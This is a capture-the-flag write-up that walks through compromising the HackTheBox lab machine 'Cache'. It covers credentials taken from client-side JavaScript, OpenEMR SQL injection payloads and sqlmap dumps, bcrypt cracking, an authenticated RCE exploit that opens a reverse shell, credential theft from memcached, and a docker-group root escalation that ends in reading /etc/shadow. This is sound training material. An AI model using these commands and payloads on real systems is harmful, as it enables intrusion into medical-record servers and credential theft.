Install tools used in this WU on BlackArch Linux:
$ pacman -S nmap lynx ffuf exploitdb metasploit sqlmap john docker
Network enumeration
Quick nmap scan:
# Nmap 7.80 scan initiated Fri Jun 12 13:19:40 2020 as: nmap -sSVC -p- -oA nmap_full
Nmap scan report for
Host is up (0.021s latency).
Not shown: 65533 closed ports
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
| 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_ 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at .
# Nmap done at Fri Jun 12 13:20:07 2020 -- 1 IP address (1 host up) scanned in 26.73 seconds
Let's set the local domain in /etc/hosts
$ cat /etc/hosts | grep cache cache.htb
HTTP enumeration & discovery
Let's see which pages are listed on the home page:
$ lynx -dump -listonly -nonumbers http://cache.htb/index.html
If we look at the source of login.html
we can see this script is included:
< script src = "jquery/functionality.js" ></ script >
$ ( function (){
var error_correctPassword = false ;
var error_username = false ;
function checkCorrectPassword (){
var Password = $ ( "#password" ). val ();
if ( Password != 'H@v3_fun' ){
alert ( "Password didn't Match" );
error_correctPassword = true ;
function checkCorrectUsername (){
var Username = $ ( "#username" ). val ();
if ( Username != "ash" ){
alert ( "Username didn't Match" );
error_username = true ;
$ ( "#loginform" ). submit ( function ( event ) {
/* Act on the event */
error_correctPassword = false ;
checkCorrectPassword ();
error_username = false ;
checkCorrectUsername ();
if ( error_correctPassword == false && error_username == false ){
return true ;
else {
return false ;
So the creds are:
username: ash
password: H@v3_fun
That let us access to http://cache.htb/net.html , a page under construction.
This is just a troll.
At http://cache.htb/author.html , the author is talking about another project:
page or directory don't exist; lets' try to enumerate more with ffuf .
$ ffuf -u http://cache.htb/FUZZ -r -c -w ~/CTF/tools/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt -e .txt,.html -fc 403
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
:: Method : GET
:: URL : http://cache.htb/FUZZ
:: Wordlist : FUZZ: /home/noraj/CTF/tools/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt
:: Extensions : .txt .html
:: Follow redirects : true
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
:: Filter : Response status: 403
login.html [Status: 200, Size: 2421, Words: 389, Lines: 106]
index.html [Status: 200, Size: 8193, Words: 902, Lines: 339]
news.html [Status: 200, Size: 7231, Words: 948, Lines: 100]
author.html [Status: 200, Size: 1522, Words: 180, Lines: 68]
. [Status: 200, Size: 8193, Words: 902, Lines: 339]
contactus.html [Status: 200, Size: 2539, Words: 283, Lines: 148]
jquery [Status: 200, Size: 951, Words: 65, Lines: 17]
net.html [Status: 200, Size: 290, Words: 23, Lines: 19]
:: Progress: [114801/114801] :: Job [1/1] :: 1739 req/sec :: Duration: [0:01:06] :: Errors: 0 ::
That didn't gave us new pages. In fact guessing was required to find another
virtual host.
$ ffuf -u -r -c -w ~/CTF/tools/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt -H 'Host: FUZZ.htb' -fs 8193
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
:: Method : GET
:: URL :
:: Wordlist : FUZZ: /home/noraj/CTF/tools/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt
:: Header : Host: FUZZ.htb
:: Follow redirects : true
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
:: Filter : Response size: 8193
hms [Status: 200, Size: 7850, Words: 1925, Lines: 159]
:: Progress: [38267/38267] :: Job [1/1] :: 911 req/sec :: Duration: [0:00:42] :: Errors: 0 ::
Let's add this entry in /etc/hosts
$ cat /etc/hosts | grep hms hms.htb
We are quickly redirected to http://hms.htb/interface/login/login.php?site=default
HTTP exploitation (OpenEMR): SQLi
Its seems we have an openEMR instance.
There are many exploits but we don't know which version this is.
Usually I never go to EDB website and only use searchsploit
, but this time
we don't know the version used, the only thing we know is that is was a version
probably released in 2018 as the copyright is from 2018.
By searching on EDB website, we have the date of publication of the exploit.
So with some luck we can begin with the exploits published in 2018.
But those two exploits require authentication. No luck.
So let's see what exploits are also in [Metasploit][msf]:
msf5 > search openemr
Matching Modules
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/sqli/openemr/openemr_sqli_dump 2019-05-17 normal Yes OpenEMR 5.0.1 Patch 6 SQLi Dump
1 exploit/unix/webapp/openemr_sqli_privesc_upload 2013-09-16 excellent Yes OpenEMR 4.1.1 Patch 14 SQLi Privilege Escalation Remote Code Execution
2 exploit/unix/webapp/openemr_upload_exec 2013-02-13 excellent Yes OpenEMR PHP File Upload Vulnerability
The first one seems promising, let's set it up:
msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > options
Module options (auxiliary/sqli/openemr/openemr_sqli_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the OpenEMR installation
VHOST hms.htb no HTTP server virtual host
When we run it we can see the exploit works, but it seems poorly written because
it is trying to dump all system tables (295) and it's pretty slow.
msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > run
[*] Running module against
[*] DB Version: 5.7.30-0ubuntu0.18.04.1
[*] Enumerating tables, this may take a moment...
[*] Identified 295 tables.
[*] Dumping table (1/295): CHARACTER_SETS
[*] Dumping table (2/295): COLLATIONS
So let's exit that, the msf module will take hours to extract all those useless
Now we know the this SQLi is working let's see what exploit it is exactly:
msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > info
Name: OpenEMR 5.0.1 Patch 6 SQLi Dump
Module: auxiliary/sqli/openemr/openemr_sqli_dump
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2019-05-17
Provided by:
Will Porter <>
Check supported:
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the OpenEMR installation
VHOST hms.htb no HTTP server virtual host
This module exploits a SQLi vulnerability found in OpenEMR version
5.0.1 Patch 6 and lower. The vulnerability allows the contents of
the entire database (with exception of log and task tables) to be
extracted. This module saves each table as a `.csv` file in your
loot directory and has been tested with OpenEMR 5.0.1 (3).
In metasploit you can use the edit
command to open your default editor on
the source code of the module.
By doing that I read the code of the msf module and saw how to detect openEMR
version with method openemr_version
def openemr_version
res = send_request_cgi(
'method' => 'GET' ,
'uri' => normalize_uri(uri, 'admin.php' )
vprint_status( "admin.php response code: #{ res.code } " )
document = Nokogiri :: HTML (res.body)
document.css( 'tr' )[ 1 ].css( 'td' )[ 3 ].text
rescue StandardError
Let's just go to http://hms.htb/admin.php to check the version installed:
We have exactly 5.0.1 (3).
Now by reading get_response
method we know which endpoint is requested and
which parameter is vulnerable.
def get_response ( payload )
response = send_request_cgi(
'method' => 'GET' ,
'uri' => normalize_uri(uri, 'interface' , 'forms' , 'eye_mag' , 'taskman.php' ),
'vars_get' => {
'action' => 'make_task' ,
'from_id' => '1' ,
'to_id' => '1' ,
'pid' => '1' ,
'doc_type' => '1' ,
'doc_id' => '1' ,
'enc' => "1' and updatexml(1,concat(0x7e, ( #{ payload } )),0) or '"
Before dumping anything we can verify manually the URL:
Fine, we can now fire [sqlmap][sqlmap], retrieve DBMS banner:
$ sqlmap -u 'http://hms.htb/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1' -p enc -b --random-agent
___ ___[(]_____ ___ ___ {1.4.4#stable}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_|
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:51:36 /2020-07-14/
[21:51:36] [INFO] fetched random HTTP User-Agent header value 'Opera/8.51 (X11; Linux i686; U; en)' from file '/opt/sqlmap/data/txt/user-agents.txt'
[21:51:37] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('OpenEMR=b9g6um1rbhc...dmd5cln601'). Do you want to use those [Y/n] n
[21:52:08] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
[21:52:08] [INFO] testing if the target URL content is stable
[21:52:38] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[21:54:08] [CRITICAL] connection timed out to the target URL
[21:54:08] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[21:54:24] [CRITICAL] can't check dynamic content because of lack of page content
[21:54:24] [INFO] heuristic (basic) test shows that GET parameter 'enc' might be injectable (possible DBMS: 'MySQL')
[21:54:24] [INFO] testing for SQL injection on GET parameter 'enc'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[21:54:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:55:29] [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests
[21:55:29] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[21:56:25] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[21:57:55] [CRITICAL] connection timed out to the target URL
[21:58:25] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[21:59:55] [CRITICAL] connection timed out to the target URL
[22:00:25] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[22:01:55] [CRITICAL] connection timed out to the target URL
[22:02:25] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
there seems to be a continuous problem with connection to the target. Are you sure that you want to continue? [y/N] N
[22:03:36] [ERROR] user quit
[22:03:36] [WARNING] you haven't updated sqlmap for more than 84 days!!!
[*] ending @ 22:03:36 /2020-07-14/
It's kinda working but pretty slow and unstable, so let's find another endpoint as it seems there
are many SQLi.
There is a document OpenEMR v5.0.1.3 - Vulnerability Report
for exactly the same version as us. A dozen of SQLi are listed here.
portal/add_edit_event_user.php?eid=1 AND EXTRACTVALUE(0,CONCAT(0x5c,VERSION()))
interface/forms/eye_mag/php/Anything_simple.php?display=i&encounter=1' AND (SELECT 0 FROM(SELECT COUNT(*),CONCAT(@@VERSION,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- -&category_name=POSTSEG
interface/forms_admin/forms_admin.php?id=32' OR (SELECT 0 FROM(SELECT COUNT(*),CONCAT(@@VERSION,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- -&method=enable
The ones in 3.1 and 3.2 (portal) seems to give a SQL error while those from 3.3
to 3.9 seem to require authentication.
Those two request won't works because we need valid cookies even if the attack is unauthenticated.
Also we need to fill the registration form with random data even if we never receive the confirmation email, this will set a valid cookie.
$ sqlmap -u 'http://hms.htb/portal/add_edit_event_user.php?eid=1' -p eid --random-agent --threads 10 --batch -b
$ sqlmap -u 'http://hms.htb/portal/find_appt_popup_user.php?catid=1' -p catid --random-agent --threads 10 --batch -b
So we have to add the --cookie
$ sqlmap -u 'http://hms.htb/portal/add_edit_event_user.php?eid=1' -p eid --cookie 'OpenEMR=jcn4a7ce07kbngbo7r9rolttgu; PHPSESSID=fcfeq8h77phga1bs6b1cshh64e' --random-agent --threads 10 --batch -b
___ ___[.]_____ ___ ___ {1.4.4#stable}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_|
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:28:23 /2020-07-14/
[23:28:23] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.792.0 Safari/535.1' from file '/opt/sqlmap/data/txt/user-agents.txt'
[23:28:23] [INFO] resuming back-end DBMS 'mysql'
[23:28:23] [INFO] testing connection to the target URL
[23:28:23] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
Parameter: eid (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: eid=(SELECT (CASE WHEN (8435=8435) THEN 1 ELSE (SELECT 1164 UNION SELECT 9741) END))
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: eid=1 AND EXTRACTVALUE(4452,CONCAT(0x5c,0x71787a7a71,(SELECT (ELT(4452=4452,1))),0x717a716271))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: eid=1 AND (SELECT 5294 FROM (SELECT(SLEEP(5)))KKhg)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: eid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71787a7a71,0x73535a4b567775646f4d7849526d4b6d4a697572466f44734446724d5072526b7079474c6a616242,0x717a716271),NULL-- -
[23:28:23] [INFO] the back-end DBMS is MySQL
[23:28:23] [INFO] fetching banner
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.1
banner: '5.7.30-0ubuntu0.18.04.1'
[23:28:23] [INFO] fetched data logged to text files under '/home/noraj/.sqlmap/output/hms.htb'
[23:28:23] [WARNING] you haven't updated sqlmap for more than 84 days!!!
[*] ending @ 23:28:23 /2020-07-14/
Alternatively you can store the raw HTTP request in a file:
GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: OpenEMR=jcn4a7ce07kbngbo7r9rolttgu; PHPSESSID=fcfeq8h77phga1bs6b1cshh64e
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
And then tell sqlmap to use this req file:
$ sqlmap -r "$(pwd)/sqli.req" --random-agent --threads 10 --batch -b
Now let's use sqlmap dump options.
available databases [2]:
[*] information_schema
[*] openemr
-D openemr --tables
Database: openemr
[234 tables]
| array |
| groups |
| sequences |
| user_settings |
| users |
| users_facility |
| users_secure |
| valueset |
| voids |
| x12_partners |
-D openemr -T users --columns
-D openemr -T users -C username,password --dump
Database: openemr
Table: users
[3 entries]
| username | password |
| openemr_admin | NoLongerUsed |
| phimail-service | NoLogin |
| portal-user | NoLogin |
It seems not to be the right table, lets' try this one instead.
-D openemr -T users_secure -C username,password --dump
Database: openemr
Table: users_secure
[1 entry]
| username | password |
| openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. |
Let's put the hash in a file to crack it with [JtR][JtR]:
$ printf %s '$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.' > hash.txt
$ john -w /usr/share/wordlists/password/rockyou.txt --format=bcrypt hash.txt
Warning: invalid UTF-8 seen reading /usr/share/wordlists/password/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx (?)
1g 0:00:00:01 DONE (2020-07-15 00:51) 0.6369g/s 722.2p/s 722.2c/s 722.2C/s water..zombie
Use the "--show" option to display all of the cracked passwords reliably
Session completed
$ john --show hash.txt
1 password hash cracked, 0 left
Now we have some creds: openemr_admin
/ xxxxxx
HTTP exploitation (OpenEMR): RCE
Now we will be able to use the authenticated RCE we found earlier.
Warning : Using EDB-48515 that has a neutral impact rather than EDB-45161 that
will reset the config to default for everyone!!!
$ searchsploit -m 48515
Exploit: OpenEMR 5.0.1 - Remote Code Execution
Path: /usr/share/exploitdb/exploits/php/webapps/
File Type: ASCII text, with CRLF line terminators
Copied to: /home/noraj/CTF/HackTheBox/machines/Cache/
Let's modify, the remote URL, the LHOST, LPORT, and admin creds.
Then start a listener & start the exploit:
$ pwncat -l 8888 -vv
INFO: Listening on :::8888 (family 10/IPv6, TCP)
INFO: Listening on (family 2/IPv4, TCP)
INFO: Client connected from (family 2/IPv4, TCP)
Linux cache 4.15.0-109-generic #110-Ubuntu SMP Tue Jun 23 02:39:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
23:11:40 up 32 min, 0 users, load average: 0.07, 0.02, 0.03
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python2
[+] Authentication with credentials provided please be patient
[+] Uploading a payload it will take a minute
[+] You should be getting a shell
Afterward I created my own exploit for OpenEMR RCE:
$ ruby OpenEMR-RCE/exploit.rb auto -r http://hms.htb -u openemr_admin -p xxxxxx -h -t 8888
$ ruby OpenEMR-RCE/exploit.rb semi-auto -r http://hms.htb -u openemr_admin -p xxxxxx -h -t 8888 -m 'php/reverse_php'
$ ruby OpenEMR-RCE/exploit.rb manual -r http://hms.htb -u openemr_admin -p xxxxxx -s tmp548.php
Elevation of Privilege (EoP): www-data to ash
We can use the credentials (ash
/ H@v3_fun
) we found at the beginning.
$ which python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cache:/$ su ash
su ash
Password: H@v3_fun
ash@cache:/$ cd
ash@cache:~$ cat user.txt
cat user.txt
But this is totally optional it's possible to jump over this step and directly
elevate to user luffy from www-data.
Elevation of Privilege (EoP): ash to luffy
Let's see open TCP sockets:
$ ss -nlpt
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128*
LISTEN 0 128*
LISTEN 0 80*
LISTEN 0 128*
LISTEN 0 128 [::]:22 [::]:*
LISTEN 0 128 [::]:11211 [::]:*
LISTEN 0 128 *:80 *:*
Ohoh we have port 11211 used by memcached.
We can confirm the process is running:
$ ps -ef f | grep memcached
memcache 1125 1 0 22:39 ? Ssl 0:00 /usr/bin/memcached -m 64 -p 11211 -u memcache -l -P /var/run/memcached/
ash 6235 5474 0 23:30 pts/1 S+ 0:00 | \_ grep --color=auto memcached
www-data 4693 4669 0 23:04 ? Sl 0:00 | \_ memcached
Let's check some advices on HackTricks : 11211 - Pentesting Memcache
$ telnet 11211
telnet 11211
Connected to
Escape character is '^]'.
VERSION 1.5.6 Ubuntu
stats items
stats items
STAT items:1:number 5
stats cachedump 1 0
stats cachedump 1 0
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
get user
get user
VALUE user 0 5
get passwd
get passwd
VALUE passwd 0 9
get file
get file
VALUE file 0 7
get account
get account
VALUE account 0 9
Now we can use the creds: luffy
/ 0n3_p1ec3
$ su luffy
su luffy
Password: 0n3_p1ec3
luffy@cache:/$ cd
Elevation of Privilege (EoP): luffy to root
We can see there is docker running and the user is in docker group.
$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)
$ ps -ef f | grep docker
ps -ef f | grep docker
root 918 1 0 22:39 ? Ssl 0:05 /usr/bin/dockerd -H fd://
root 1358 918 0 22:39 ? Ssl 0:04 \_ containerd --config /var/run/docker/containerd/containerd.toml --log-level info
root 6934 1358 0 23:45 ? Sl 0:00 \_ containerd-shim -namespace moby -workdir /var/lib/docker/containerd/daemon/io.containerd.runtime.v1.linux/moby/f211bc4cffb910b8c45b09d9eeec6c9483af4fff6222a5ca7c211aef6ca3bc94 -address /var/run/docker/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
Being in docker group is like being root because of the capabilities.
My reflex is to check GTFOBins if there are some ready to use payloads
for EoP, and there is .
Let's find what images are available:
$ docker images
docker images
ubuntu latest 2ca708c1c9cc 10 months ago 64.2MB
So let's spawn a shell through a shared volume:
luffy@cache:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash
docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash
root@ae6411b77a1e:/# cd
root@ae6411b77a1e:~# cat root.txt
cat root.txt
root@ae6411b77a1e:~# cat /etc/shadow | grep root
cat /etc/shadow | grep root